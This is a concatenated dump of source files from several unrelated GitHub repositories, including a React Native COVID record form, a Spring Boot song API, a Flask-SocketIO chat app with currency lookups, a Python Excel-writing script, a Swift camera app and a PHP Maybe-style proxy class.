var msg = {"vaccineeID":vaccineeID, "vaccinatorID":vaccinatorID, "location":location, "txType":txType, "date":date};
msg = JSON.stringify(msg)
var iaddress = await fetch(
`https://itrace-middleware.herokuapp.com/getAddressAdmin/${vaccineeID}`
);
iaddress = await iaddress.json();
console.log("Patients Seed&Address", iaddress);
if(iaddress != false)
{
await fetch("https://itrace-middleware.herokuapp.com/sendTx", {
method: "POST",
body: JSON.stringify({
seed: iaddress[0],
address: iaddress[1],
txType: txType,
Data: msg
}),
headers: {
"Content-type": "application/json; charset=UTF-8"
}
})
}
setProcessing(false)
alert("Vaccination Record Added")
} catch (e) {
setProcessing(false)
console.log("Error API ", e)
}
}
const addTest = async (key, value) => {
try {
setProcessing(true)
var msg = {"testeeID":testeeID, "testerID":testerID, "location":location, "txType":txType, "date":date, "result": hasCovid};
msg = JSON.stringify(msg)
var iaddress = await fetch(
`https://itrace-middleware.herokuapp.com/getAddressAdmin/${testeeID}`
);
iaddress = await iaddress.json();
console.log("Patients Seed&Address", iaddress);
if(iaddress != false)
{
await fetch("https://itrace-middleware.herokuapp.com/sendTx", {
method: "POST",
body: JSON.stringify({
seed: iaddress[0],
address: iaddress[1],
txType: txType,
Data: msg
}),
headers: {
"Content-type": "application/json; charset=UTF-8"
}
})
}
setProcessing(false)
alert("Covid Test Record Added")
} catch (e) {
setProcessing(false)
console.log("Error API ", e)
}
}
return (
<View style={styles.container}>
<View style={{zIndex:1}}>
<ScrollView horizontal={false} showsVerticalScrollIndicator={true}>
<View style={{alignItems: 'center'}}>
<Spinner
visible={processing}
textStyle={[styles.text, {color:'white'}]}
textContent={"Please Wait while your record is being Added"}
/>
<Text style={[styles.text, { fontSize: 20 }]}>
Please Select The Record Type
</Text>
<View style={styles.btnContainer}>
<Button
buttonStyle={[styles.button, { width: 150, marginRight:5, backgroundColor: (txType === "VACCINATION") ? "#E1E9EA":"#154360", }]}
title="COVID Vaccine"
titleStyle={{ fontFamily: "MetropolisBold", color: (txType === "VACCINATION") ? "black":"white" }}
onPress={() => setTxType("VACCINATION")}
></Button>
<Button
buttonStyle={[styles.button, { width: 150, marginLeft:5, backgroundColor: (txType === "COVIDTEST") ? "#E1E9EA":"#154360" }]}
title="COVID Test"
titleStyle={{ fontFamily: "MetropolisBold", color: (txType === "COVIDTEST") ? "black":"white" }}
onPress={() => setTxType("COVIDTEST")}
></Button>
</View>
<Text style={[styles.text, { fontSize: 20, marginVertical:20 }]}>
{(txType === "VACCINATION") ? "Adding Record For COVID Vaccination" : "Adding Record For COVID Test"}
</Text>
{(txType === "VACCINATION") && <View style={{width: '100%'}}>
<Input style={styles.input} placeholder="CNIC of Patient" onChangeText={value => setVaccineeID(value)}/>
<Input style={styles.input} placeholder="ID of Vaccinator" onChangeText={value => setvaccinatorID(value)}/>
<Input style={styles.input} placeholder="Location" onChangeText={value => setLocation(value)}/>
<Input style={styles.input} placeholder="Date" onChangeText={value => setDate(value)}/>
</View>}
{(txType === "COVIDTEST") && <View style={{width: '100%'}}>
<Input style={styles.input} placeholder="CNIC of Patient" onChangeText={value => setTesteeID(value)}/>
<Input style={styles.input} placeholder="ID of Testing Entity" onChangeText={value => setTesterID(value)}/>
<Input style={styles.input} placeholder="Location" onChangeText={value => setLocation(value)}/>
<Input style={styles.input} placeholder="Date" onChangeText={value => setDate(value)}/>
<Text style={[styles.text, { fontSize: 20 }]}>Result</Text>
<View style={{marginVertical: 10, flexDirection: 'row', alignSelf:'center',}}>
<Button
buttonStyle={[styles.button, { width: 100, marginRight:5, borderColor:"#1C2833", backgroundColor: hasCovid ? "#E74C3C":"#CCD1D1" }]}
title="Positive"
titleStyle={{ fontFamily: "MetropolisBold" }}
onPress={() => setHasCovid(true)}
></Button>
<Button
buttonStyle={[styles.button, { width: 100, marginLeft:5, borderColor:"#1C2833", backgroundColor: hasCovid ? "#CCD1D1":"#1E8449" }]}
title="Negative"
titleStyle={{ fontFamily: "MetropolisBold" }}
onPress={() => setHasCovid(false)}
></Button>
</View>
</View>}
<Button
buttonStyle={[styles.button, {width:250}]}
title="Add Record"
icon={
<Icon
name="plus-circle"
size={20}
color="white"
solid
style={{position:'absolute', right:20}}
/>
}
iconRight
onPress={async () => {
try{
(txType === "VACCINATION") ? await addVaccine() : await addTest()
navigation.navigate("Welcome")
}catch(e){
alert("Error")
}
}}
></Button>
<View><Text></Text></View>
</View>
</ScrollView>
</View>
</View>
);
};
const styles = StyleSheet.create({
container: {
flex: 1,
backgroundColor: "#2C3E50",
alignItems: "center",
justifyContent: "center",
margin:'auto',
paddingTop: 0,
paddingHorizontal: 0,
borderWidth: 0,
borderColor: "#273157",
zIndex:2
},
button: {
backgroundColor: "#196F3D",
color: "white",
width: 150,
height:40,
margin: 5,
borderRadius: 90,
borderWidth: 2,
borderColor: "#52BE80",
},
btnText:{
position:'absolute',
left:20
},
text: {
// fontFamily: "Varela",
color: "#F0F3F4",
textAlign: "center",
fontSize: 20,
},
image: {
position:'absolute',
bottom: 0,
width: "100%",
height: 100,
zIndex:0
},
btnContainer: {
flexDirection: "row",
alignSelf: "center",
marginBottom: 20,
marginTop:20,
width:'100%',
padding:10,
backgroundColor:'#154360',
borderRadius:90
},
input: {
borderRadius:90,
borderColor: '#D3D4D5',
borderWidth:2,
paddingHorizontal:10,
marginBottom:10
},
});
|
440775f7e7e02e9bed04a55a33c4c672c9a2ec14
|
[
"JavaScript"
] | 4
|
JavaScript
|
NomanNasirMinhas/Itrace-App-React-Native
|
7db7e91f9751c18f2d832bf50ad134b329905684
|
047e0c8a8807973726af3434fc70aeb0fdcf554a
|
refs/heads/main
|
<repo_name>htw-kbe-wise2021/unicorn<file_sep>/src/main/java/com/kbe/unicorn/song/SongDto.java
package com.kbe.unicorn.song;
import javax.validation.constraints.NotBlank;
import javax.validation.constraints.NotNull;
import lombok.Data;
@Data
public class SongDto {
@NotBlank
private String title;
@NotBlank
private String label;
@NotNull
private Integer released;
@NotBlank
private String artist;
}
<file_sep>/src/main/java/com/kbe/unicorn/song/SongService.java
package com.kbe.unicorn.song;
import java.util.Collection;
import javax.transaction.Transactional;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.http.HttpStatus;
import org.springframework.stereotype.Service;
import org.springframework.web.server.ResponseStatusException;
@Service
public class SongService {
@Autowired
SongRepository repo;
public SongEntity findById(long id) {
return repo.findById(id).orElseThrow(() -> new ResponseStatusException(HttpStatus.NOT_FOUND));
}
public Collection<SongEntity> findAll() {
return repo.findAll();
}
public SongEntity newSong(SongEntity song) {
return repo.save(song);
}
@Transactional
public void deleteById(long id) {
if (!repo.existsById(id)) {
throw new ResponseStatusException(HttpStatus.NOT_FOUND);
}
repo.deleteById(id);
}
}
<file_sep>/src/main/java/com/kbe/unicorn/song/SongController.java
package com.kbe.unicorn.song;
import java.util.Collection;
import javax.validation.Valid;
import org.modelmapper.ModelMapper;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.DeleteMapping;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;
import org.springframework.web.servlet.support.ServletUriComponentsBuilder;
@RestController()
@RequestMapping("/songs")
public class SongController {
@Autowired
SongService service;
@Autowired
private ModelMapper modelMapper;
@GetMapping("/{id}")
public SongEntity one(@PathVariable long id) {
return service.findById(id);
}
@GetMapping()
public Collection<SongEntity> all() {
return service.findAll();
}
@PostMapping()
public ResponseEntity<Void> create(@RequestBody @Valid SongDto song) {
System.out.println(song);
var createdSong = service.newSong(convertToEntity(song));
var location = ServletUriComponentsBuilder
.fromCurrentRequest()
.path("/{id}")
.buildAndExpand(createdSong.getId())
.toUri();
return ResponseEntity.created(location).build();
}
@DeleteMapping("/{id}")
public ResponseEntity<Void> delete(@PathVariable long id) {
service.deleteById(id);
return ResponseEntity.noContent().build();
}
private SongDto convertToDto(SongEntity song) {
return modelMapper.map(song, SongDto.class);
}
private SongEntity convertToEntity(SongDto song) {
return modelMapper.map(song, SongEntity.class);
}
}
<file_sep>/src/main/resources/application.properties
server.servlet.contextPath=/songsservlet-unicorn
server.error.include-stacktrace=never<file_sep>/Dockerfile
FROM maven:3-eclipse-temurin-17 AS MAVEN_ENV
RUN $JAVA_HOME/bin/jlink \
--add-modules java.base \
--compress=2 \
--add-modules jdk.jfr,jdk.management.agent,java.base,java.logging,java.xml,jdk.unsupported,java.sql,java.naming,java.desktop,java.management,java.security.jgss,java.instrument \
--no-header-files \
--no-man-pages \
--strip-debug \
--output /javaruntime
COPY pom.xml /tmp/
COPY src /tmp/src/
WORKDIR /tmp/
RUN mvn package -DskipTests=true
FROM debian:buster-slim
ENV JAVA_HOME=/opt/java/openjdk
ENV PATH "${JAVA_HOME}/bin:${PATH}"
COPY --from=MAVEN_ENV /javaruntime $JAVA_HOME
RUN mkdir /app
WORKDIR /app
COPY --from=MAVEN_ENV /tmp/target/unicorn-*.jar /app/app.jar
COPY exercises /app/exercises
EXPOSE 8080
ENTRYPOINT ["java", "-jar", "app.jar"]
<file_sep>/src/main/java/com/kbe/unicorn/UnicornApplication.java
package com.kbe.unicorn;
import io.swagger.v3.oas.annotations.OpenAPIDefinition;
import io.swagger.v3.oas.annotations.info.Info;
import io.swagger.v3.oas.annotations.servers.Server;
import org.modelmapper.ModelMapper;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.context.annotation.Bean;
@OpenAPIDefinition(info = @Info(title = "Unicorn API", version = "1.0"),
servers = @Server(url = "/songsservlet-unicorn", description = "Magical API"))
@SpringBootApplication
public class UnicornApplication {
public static void main(String[] args) {
SpringApplication.run(UnicornApplication.class, args);
}
@Bean
public ModelMapper modelMapper() {
return new ModelMapper();
}
}
<file_sep>/README.md
# Komponentenbasierte Entwicklung
In diesem Repository befinden sich unsere Lösungen der Belegaufgaben für den Kurs Komponentenbasierte Entwicklung an der Hochschule für Technik und Wirtschaft Berlin.

## Über uns
[<NAME>](https://github.com/ZerNico)
s0573840
[<NAME>](https://github.com/Thorben0)
s0573288
|
0382df95bbea9be11fd09a3c0d02b9152f5841ec
|
[
"Markdown",
"Java",
"Dockerfile",
"INI"
] | 7
|
Java
|
htw-kbe-wise2021/unicorn
|
a39ba800e35cef858b0803320f872995da6102c2
|
2b8719b39e25204251d786e83602bdc31a7f5ba6
|
refs/heads/master
|
<file_sep>//
// CameraViewController.swift
// ocvCameraImage
//
// Created by <NAME> on 2014/09/20.
// Copyright (c) 2014年 masanori. All rights reserved.
//
import UIKit
import AVFoundation
class CameraViewController: UIViewController, AVCaptureVideoDataOutputSampleBufferDelegate
{
@IBOutlet weak var btnCancel: UIBarButtonItem!
@IBOutlet weak var imgCameraView: UIImageView!
var cpsSession: AVCaptureSession!
//var videoDataOutputQueue: dispatch_queue_t!
var imcImageController: ImageController!
override func viewDidLoad()
{
super.viewDidLoad()
imcImageController = ImageController()
// 初期化.
imcImageController.initImageController()
}
override func viewWillAppear(animated: Bool)
{
// カメラの使用準備
self.initCamera()
}
override func viewDidDisappear(animated: Bool)
{
self.cpsSession.stopRunning()
for output in self.cpsSession.outputs
{
self.cpsSession.removeOutput(output as! AVCaptureOutput)
}
for input in self.cpsSession.inputs
{
self.cpsSession.removeInput(input as! AVCaptureInput)
}
self.cpsSession = nil
}
override func didReceiveMemoryWarning() {
super.didReceiveMemoryWarning()
}
@IBAction func btnCancelTouched(sender: UIBarButtonItem)
{
self.dismissViewControllerAnimated(true, completion: nil)
}
func initCamera()
{
var cpdCaptureDevice: AVCaptureDevice!
// 背面カメラの検索
for device: AnyObject in AVCaptureDevice.devices()
{
if device.position == AVCaptureDevicePosition.Back
{
cpdCaptureDevice = device as! AVCaptureDevice
}
}
// カメラが見つからなければリターン
if (cpdCaptureDevice == nil) {
println("Camera couldn't found")
return
}
cpdCaptureDevice.activeVideoMinFrameDuration = CMTimeMake(1, 30)
// 入力データの取得
var deviceInput: AVCaptureDeviceInput = AVCaptureDeviceInput.deviceInputWithDevice(cpdCaptureDevice, error: nil) as! AVCaptureDeviceInput
// 出力データの取得
var videoDataOutput:AVCaptureVideoDataOutput = AVCaptureVideoDataOutput()
// カラーチャンネルの設定.
let dctPixelFormatType : Dictionary<NSString, NSNumber> = [kCVPixelBufferPixelFormatTypeKey : kCVPixelFormatType_32BGRA]
videoDataOutput.videoSettings = dctPixelFormatType
// 画像をキャプチャするキューの指定
//var videoDataOutputQueue: dispatch_queue_t = dispatch_queue_create("CtrlVideoQueue", DISPATCH_QUEUE_SERIAL)
videoDataOutput.setSampleBufferDelegate(self, queue: dispatch_get_main_queue())
videoDataOutput.alwaysDiscardsLateVideoFrames = true
// セッションの使用準備
self.cpsSession = AVCaptureSession()
if(self.cpsSession.canAddInput(deviceInput))
{
self.cpsSession.addInput(deviceInput as AVCaptureDeviceInput)
}
else
{
NSLog("Failed adding Input")
}
if(self.cpsSession.canAddOutput(videoDataOutput))
{
self.cpsSession.addOutput(videoDataOutput)
}
else
{
NSLog("Failed adding Output")
}
self.cpsSession.sessionPreset = AVCaptureSessionPresetMedium
self.cpsSession.startRunning()
}
func captureOutput(captureOutput: AVCaptureOutput!, didOutputSampleBuffer sampleBuffer: CMSampleBuffer!, fromConnection connection: AVCaptureConnection!) {
// SampleBufferから画像を取得してUIImageViewにセット.
imgCameraView.image = imcImageController.createImageFromBuffer(sampleBuffer)
}
/*func imageFromSampleBuffer(sampleBuffer: CMSampleBufferRef) -> UIImage
{
// ピクセルバッファの取得.
var imageBuffer: CVImageBufferRef = CMSampleBufferGetImageBuffer(sampleBuffer);
// ピクセルバッファのベースアドレスをロックする
CVPixelBufferLockBaseAddress(imageBuffer, 0);
// Get information of the image
var baseAddress = CVPixelBufferGetBaseAddressOfPlane(imageBuffer, 0)
var bytesPerRow:size_t = CVPixelBufferGetBytesPerRow(imageBuffer);
var width:size_t = CVPixelBufferGetWidth(imageBuffer);
var height:size_t = CVPixelBufferGetHeight(imageBuffer);
// RGBの色空間
var colorSpace:CGColorSpaceRef = CGColorSpaceCreateDeviceRGB();
var newContex:CGContextRef = CGBitmapContextCreate(baseAddress,
width,
height,
8,
bytesPerRow,
colorSpace,
CGBitmapInfo(CGImageAlphaInfo.PremultipliedFirst.toRaw()))
var imageRef:CGImageRef = CGBitmapContextCreateImage(newContex);
var ret:UIImage = UIImage(CGImage: imageRef);
//CGImageRelease(imageRef);
//CGContextRelease(newContext);
//CGColorSpaceRelease(colorSpace);
CVPixelBufferUnlockBaseAddress(imageBuffer, 0);
return ret;
}*/
}<file_sep># [iOS]ocvCameraImage
get edges from camera image by OpenCV
## License
Same as OpenCV http://opencv.willowgarage.com/wiki
## Version
* iOS8.4(iPhone5s)
* Xcode6.4
* OpenCV 3.0
## Required frameworks
* [opencv2.framework](http://opencv.org/downloads.html)
* CoreVideo.framework
* CoreMedia.framework
* AutioToolbox.framework
* AVFoundation.framework
<file_sep>//
// ViewController.swift
// ocvCameraImage
//
// Created by <NAME> on 2014/09/20.
// Copyright (c) 2014年 masanori. All rights reserved.
//
import UIKit
class ViewController: UITableViewController
{
@IBOutlet weak var btnStart: UIButton!
var stbCameraView: UIStoryboard!
var cvcCameraView: CameraViewController!
override func viewDidLoad() {
super.viewDidLoad()
// 遷移先のStoryboardの準備
stbCameraView = UIStoryboard(name: "CameraView", bundle: nil)
cvcCameraView = stbCameraView!.instantiateViewControllerWithIdentifier("CameraViewCtrl") as! CameraViewController
}
override func didReceiveMemoryWarning() {
super.didReceiveMemoryWarning()
// Dispose of any resources that can be recreated.
}
@IBAction func btnStartTouched(sender: UIButton)
{
// 次のStoryboardを表示する
self.presentViewController(cvcCameraView, animated:false, completion: nil)
}
}
|
f5c2cbabc36948e335ea4a4dcde0dfd119db3ac1
|
[
"Swift",
"Markdown"
] | 3
|
Swift
|
vollcano/ocvCameraImage
|
d22bd6493760e3b122bbcec02272d806af9f81e3
|
f511f23750632c0097e8434805f5547964898f95
|
refs/heads/master
|
<repo_name>syntaxkim/project2-chatterbox<file_sep>/README_KOR.md
# Project 2 - Chatterbox (JavaScript)
English: [README.md](https://github.com/syntaxkim/project2-chatterbox/blob/master/README.md)
JavaScript로 구현한 싱글 페이지 애플리케이션(SPA)입니다. 소켓을 활용한 전이중(Full-duplex) 통신 온라인 메시징 서비스를 제공합니다.
데모: https://minsu-chatterbox.herokuapp.com/

## 기능
### 유저 기억
유저의 이름은 로컬 스토리지, 채널은 세션 스토리지에 각각 저장되게 하였습니다.

### 채널 생성
기본 채널에 더해 접속자가 원하는 만큼 새로운 채널 생성이 가능합니다. Python의 hast table 자료구조인 dictionary와 deque 자료구조인 deque를 사용해 다수 채널을 구현하였습니다.
자료 구조
```
channels = {"general": deque([], maxlen=100)}
channels (dictionary)
|
v
"general" (deque)
|\____________________________
| |
v v
message1 (dictionary) message2
|\____________________ ____________________
| | |
v v v
"name" "message" "time"
```

### 실시간 환율 정보 (추가 기능)
KRW 기준으로 환율 정보를 제공합니다.

지원되는 통화 목록을 확인할 수 있습니다. (AJAX)

API: [exchangeratesapi](https://exchangeratesapi.io/)
## Languages and Tools
* Languages: Python 3.7, JavaScript ES6
* Frameworks and Libraries: Socket.IO, Flask, Bootstrap, jQuery
<file_sep>/exchangerateapi.py
import requests
# Free foreign exchange rates API.
url = "https://api.exchangeratesapi.io/latest"
base_currency = 'KRW'
def get_currency_list():
r = requests.get(url, params={'base': base_currency})
if r.status_code != 200:
raise Exception("ERROR: API request unsuccessful.")
currency_list = [k for k in r.json()['rates']]
return currency_list
def get_exchange_rate(base):
# Get exchange rate using external API.
r = requests.get(url, params={'base': base, 'symbol': 'KRW'})
if r.status_code !=200:
raise Exception("ERROR: API request unsuccessful.")
exchange_rate = r.json()['rates']['KRW']
return exchange_rate<file_sep>/static/index.js
// When the DOM is done loaded,
document.addEventListener('DOMContentLoaded', () => {
// Get user name
if(!localStorage.getItem('name')) {
$('#modal').modal({ show:true, focus:true, keyboard:false, backdrop:'static' })
} else {
var name = localStorage.getItem('name')
document.querySelector('#username').innerHTML = name;
};
// Get channel name
if(!sessionStorage.getItem('channel')) {
sessionStorage.setItem('channel', 'general');
var channel = sessionStorage.getItem('channel');
} else {
var channel = sessionStorage.getItem('channel');
};
// Connect to websocket
const url = location.protocol + '//' + document.domain + ':' + location.port;
var socket = io.connect(url);
// When connected, configure buttons
socket.on('connect', () => {
// Disply the default channel
socket.emit('get messages', {'before': null, 'after': channel});
// Join in a user
document.querySelector('#join').onclick = join;
// Send a message
document.querySelector('#send').onsubmit = send;
// Create a channel
document.querySelector('#create').onclick = create;
// Load the channel
document.querySelectorAll('.channel').forEach(link => load(link));
// Leave the user
document.querySelector('#leave').onclick = leave;
});
function join() {
const name = document.querySelector('#name').value;
if (!name) {
document.querySelector('#user_message').innerHTML = "No user name";
return false;
} else {
// Save user name in client-side memory
socket.emit('join', {'name': name}, data => {
if (data === 1) {
document.querySelector('#user_message').innerHTML = "Username already taken";
return false;
} else {
localStorage.setItem('name', name);
location.reload();
};
});
};
};
function send() {
const message = document.querySelector('#message').value;
if (!message) {
return false;
} else {
const channel = sessionStorage.getItem('channel');
socket.emit('send', {'channel': channel, 'name': name, 'message': message});
document.querySelector('#message').value = "";
// Do not reload
return false;
};
};
function create() {
const channel = document.querySelector('#channel_name').value;
if (!channel) {
document.querySelector('#channel_message').innerHTML = "No channel name";
return false;
} else {
socket.emit('create', {'channel': channel}, data => {
if (data === 1) {
document.querySelector('#channel_message').innerHTML = "The same channel name already exists.";
return false;
} else if (data === 0) {
location.reload();
alert(`New channel: '${channel}' created.`);
};
});
};
};
function load(link) {
link.onclick = () => {
const before = sessionStorage.getItem('channel');
const after = link.dataset.channel;
socket.emit('get messages', {'before': before, 'after': after});
};
};
function leave() {
socket.emit('leave', {'name': name});
localStorage.clear();
sessionStorage.clear();
location.reload();
};
// Load messages
socket.on('load messages', data => loadMessages(data));
// Recieve a new message
socket.on('new message', data => newMessage(data));
// Modal for currency list
var currency_modal = document.querySelector('#currency_modal');
// Get currency list
document.querySelector('#open_currency_list').onclick = getCurrencyList;
// Close currency modal
document.querySelector('#close_currency_list').onclick = () => {
currency_modal.style.display = "none";
};
window.onclick = function(event) {
if (event.target == currency_modal) {
currency_modal.style.display = "none";
};
};
});
function loadMessages(data) {
sessionStorage.setItem('channel', data.channel);
document.querySelector('#channelname').innerHTML = data.channel;
const messages = data.messages;
document.querySelector('#messages').innerHTML = "";
messages.forEach(data => newMessage(data));
};
function newMessage(data) {
if (!data.time) data.time="";
const card = document.createElement('div');
const att = document.createAttribute("class");
att.value = "card mb-1";
card.setAttributeNode(att);
const cardBody = document.createElement('div');
const att2 = document.createAttribute("class");
att2.value = "card-body py-3";
cardBody.setAttributeNode(att2);
card.append(cardBody);
cardBody.innerHTML = `<strong>${data.name}</strong> : ${data.message} ${data.time}`;
document.querySelector('#messages').append(card);
scrollToBottom();
};
function scrollToBottom() {
let messageList = document.querySelector('#message-list')
messageList.scrollTop = messageList.scrollHeight - messageList.clientHeight;
console.log(messageList.scrollTop);
};
function getCurrencyList() {
const request = new XMLHttpRequest();
request.open('GET', '/getCurrencyList');
request.responseType = 'json';
request.onload = () => {
document.querySelector('#currency_list').innerHTML = '';
const data = request.response;
var currency_list = data.currency_list;
currency_list.forEach(currency => {
document.querySelector('#currency_list').append(`${currency}, `);
});
currency_modal.style.display = "block";
};
request.send();
return false;
}<file_sep>/requirements.txt
Flask==1.0.2
flask-socketio==3.1.0
gevent==1.3.7
gevent-websocket==0.10.1
gunicorn==19.9.0
requests==2.20.1<file_sep>/README.md
# Project 2 - Chatterbox (JavaScript)
한국어: [README_KOR.md](https://github.com/syntaxkim/project2-chatterbox/blob/master/README_KOR.md)
A single-page application(SPA) which provides the full-duplex communication online messaging service using JavaScript and Socket.IO.
Demo app: https://minsu-chatterbox.herokuapp.com/

## Features
### Save user information
Username and channel name are saved in local and session storage each.

### Create your own channel
You can create your own channel as many as you want. Multiple channels are implemented by using Python's dictionary(hash table) and deque(deque).
Data structures
```
channels = {"general": deque([], maxlen=100)}
channels (dictionary)
|
v
"general" (deque)
|\____________________________
| |
v v
message1 (dictionary) message2
|\____________________ ____________________
| | |
v v v
"name" "message" "time"
```

### Get foreign exchange rates in real-time (additional feature)
The base currency is set to KRW.

You can also look up a list of available exchange rates. (AJAX)

API: [exchangeratesapi](https://exchangeratesapi.io/)
## Languages and Tools
* Languages: Python 3.7, JavaScript ES6
* Frameworks and Libraries: Socket.IO, Flask, Bootstrap, jQuery
<file_sep>/application.py
# Built-in libraries
import os
from collections import deque
from datetime import datetime, timedelta
# External libraries
from flask import Flask, render_template, jsonify
from flask_socketio import SocketIO, emit, join_room, leave_room
# Custom library
from exchangerateapi import get_currency_list, get_exchange_rate
app = Flask(__name__)
app.config["SECRET_KEY"] = os.urandom(24)
socketio = SocketIO(app)
# Server-side memory
users = set()
channels = {"general": deque([], maxlen=100)}
currency_list = get_currency_list()
# for development
channels["general"].append({"name": "general", "message": "Welcome to Chatterbox"})
channels["channel 1"] = deque([], maxlen=100)
channels["channel 1"].append({"name": "channel 1", "message": "This is channel 1"})
channels["channel 2"] = deque([], maxlen=100)
channels["channel 2"].append({"name": "channel 2", "message": "This is channel 2"})
@app.route("/")
def index():
return render_template("index.html", channels=list(channels), users=list(users))
# Join in a user
@socketio.on("join")
def join(json):
name = json["name"]
if name in users:
return 1
else:
users.add(name)
# Send a message
@socketio.on("send")
def send(json):
# If user asks for exchange rate,
text = json["message"].upper().split()
if len(text) <= 2 and text[-1] in currency_list:
if len(text) == 1:
quantity = 1
base = text[0]
elif len(text) == 2:
quantity = int(text[0])
base = text[1]
try:
exchange_rate = get_exchange_rate(base)
json["message"] = f"{quantity} {base} is equal to {exchange_rate * quantity:.2f} KRW"
except:
json["message"] = "ERROR: API request unsuccessful."
time = get_time()
message = {"name": json['name'], "message": json["message"], "time": time}
channels[json["channel"]].append(message)
emit("new message", message, room=json["channel"])
# Create a channel
@socketio.on("create")
def create(json):
channel = json["channel"]
if channel in channels:
return 1
else:
time = get_time()
channels[channel] = deque([], maxlen=100)
channels[channel].append({"name": channel, "message": "New channel created", "time": time})
return 0
# emit("new channel", {"channel": channel}, broadcast=True)
# Load messages
@socketio.on("get messages")
def get_messages(json):
before = json["before"]
leave_room(before)
channel = json["after"]
join_room(channel)
emit("load messages", {"channel": channel, "messages": list(channels[channel])})
# leave the user
@socketio.on("leave")
def leave(json):
name = json["name"]
if name in users:
users.remove(name)
@socketio.on_error()
def error_handler(e):
print(f"An error has occured: {str(e)}")
@app.route("/getCurrencyList", methods=["GET"])
def getCurrencyList():
currency_list = get_currency_list()
return jsonify({"currency_list": currency_list})
def get_time():
return (datetime.now() + timedelta(hours=9)).strftime("%I:%M %p")
if __name__ == "__main__":
socketio.run(app, host="0.0.0.0")
|
c91c7c7e455d4249df2b49c0f36243772de3df63
|
[
"Markdown",
"Python",
"JavaScript",
"Text"
] | 6
|
Markdown
|
syntaxkim/project2-chatterbox
|
d1e8b6320620b6f5a3cf7a97936fced9d2cb3c83
|
96356bace3f89084a4d773235179ec50b9d42213
|
refs/heads/main
|
<file_sep>import openpyxl
import shutil
import os
def get_ppe_linecount(FILENAME):
#Gets the total lines so that the get_ppe_actual function can determine where the total is
line_count = 0
char_count = 0
with open(FILENAME) as file:
for line in file:
line = line.strip("\n")
line_count += 1
char_count += len(line)
return line_count
def get_ppe_actual(FILENAME):
#Determines where the total is by splitting the string of the last line of the Actuals file
#from the end of the date on the total line, which happens to be the 135th character on the last line
#then formats the string, floats it, turns it into a real number, and returns to display on console and
#write to the excel sheet
line_count = get_ppe_linecount(FILENAME)
with open(FILENAME) as file:
file_contents = file.readlines()
file_total_raw = file_contents[line_count - 1]
total_actual_str = file_total_raw[135:]
#total_actual_str = total_actual_str.replace("0", "")
#the above can't be used accurately if the actual values contain zeros
total_actual_str = total_actual_str.strip()
total_actual = float(total_actual_str)
total_actual = total_actual * 0.00000000001
total_actual = round(total_actual, 2)
return total_actual
def write_actual(total_actual):
#opens the excel sheet that is created by the post PPE queries
#relies on the path that AQT saves query results to, as well as the filename generated by the query
#writes the total value taken from the UFLACTUALS file saved in the same directory
from openpyxl.styles import Font
wb = openpyxl.load_workbook(filename='Deferred_Comp_2020-08-06.xlsx', read_only=False)
sheet = wb.get_sheet_by_name('DEF COMP')
fontObject = Font(name='MS Sans Serif', size=8)
sheet['A7'].value = 'TXT File Total'
sheet['A7'].font = fontObject
sheet['B7'].value = total_actual
sheet['B7'].font = fontObject
wb.save('Deferred_Comp_$PPE_Modified.xlsx')
def main():
os.chdir('H:\SavedQueries')
# specify file name
FILENAME = "ACTUAL.txt"
line_count = get_ppe_linecount(FILENAME)
total_actual = get_ppe_actual(FILENAME)
write_actual(total_actual)
print("Welcome!")
print()
print("lines: ", line_count)
print("Total: ", total_actual)
if __name__ == "__main__":
main()
|
dc5829889e13b782048ab4b9f5748327129d2c8c
|
[
"Python"
] | 1
|
Python
|
the-berryman/actual-edit
|
cc58dce3ed025e59b80ac692818c5f6b6cf9226b
|
f6e907b5ce61b08b292ab27bb8326cb38abcca60
|
refs/heads/master
|
<repo_name>kitsunet/Kitsunet.ProxyObjects<file_sep>/Classes/Exception.php
<?php
namespace Kitsunet\ProxyObjects;
class Exception extends \Exception {
}<file_sep>/Classes/PathNotFoundException.php
<?php
namespace Kitsunet\ProxyObjects;
/**
* Class PathNotFoundException
*
* @package Kitsunet\ProxyObjects
*/
class PathNotFoundException extends Exception {
}<file_sep>/README.md
Kitsunet.ProxyObjects
=====================
<file_sep>/Classes/MaybeObject.php
<?php
namespace Kitsunet\ProxyObjects;
/**
* A proxy object to help object method chaining without having to test for NULL all the way.
* This takes inspiration from the Maybe monad.
*
*/
class MaybeObject {
/**
* @var object The object or NULL
*/
protected $object;
/**
* @var \Closure
*/
protected $nullCallback;
/**
* @param object $object The object or NULL
* @param callable $nullCallback
*/
public function __construct($object = NULL, \Closure $nullCallback = NULL) {
$this->object = $object;
$this->nullCallback = $nullCallback;
}
/**
* @param string $method
* @param array $arguments
* @return mixed
*/
public function __call($method, $arguments) {
if ($this->object === NULL) {
if ($this->nullCallback !== NULL) {
return $this->nullCallback->__invoke($method, $arguments);
} else {
return NULL;
}
}
$result = call_user_func_array(array($this->object, $method), $arguments);
if (is_object($result)) {
return new MaybeObject($result, $this->nullCallback);
} else {
return $result;
}
}
/**
*
* @param callable $nullHandler
* @return mixed
*/
public function __invoke(\Closure $nullHandler = NULL) {
if ($nullHandler !== NULL && $this->object === NULL) {
return $nullHandler->__invoke();
}
return $this->object;
}
/**
* @return boolean
*/
public function __isNull() {
return ($this->object === NULL);
}
/**
* Set a callback function to be executed if a method was tried to be executed on the proxied object and it was in fact NULL.
* The callback receives two arguments,
* - string $name As first argument is the name of the called argument.
* - array $arguments The arguments given to the method.
*
* @param callable $callback
*/
public function __setNullCallback(\Closure $callback) {
$this->nullCallback = $callback;
}
}
|
39d391f0034c886571510a9e5bb7d97cc388de6c
|
[
"Markdown",
"PHP"
] | 4
|
PHP
|
kitsunet/Kitsunet.ProxyObjects
|
4cec4229b3b918435ca894f265591ae1facdbf36
|
c92ec2321d15c5f6f72b133b287dcf1c0b5b4a98
|
refs/heads/master
|
<repo_name>klwork/klwork-social<file_sep>/src/main/resources/db.properties
db=mydb
jdbc.driver=org.postgresql.Driver
jdbc.url=jdbc:postgresql://localhost:5432/mydb
jdbc.username=test
jdbc.password=<PASSWORD>
<file_sep>/src/test/java/com/klwork/test/base/BaseTxWebTests.java
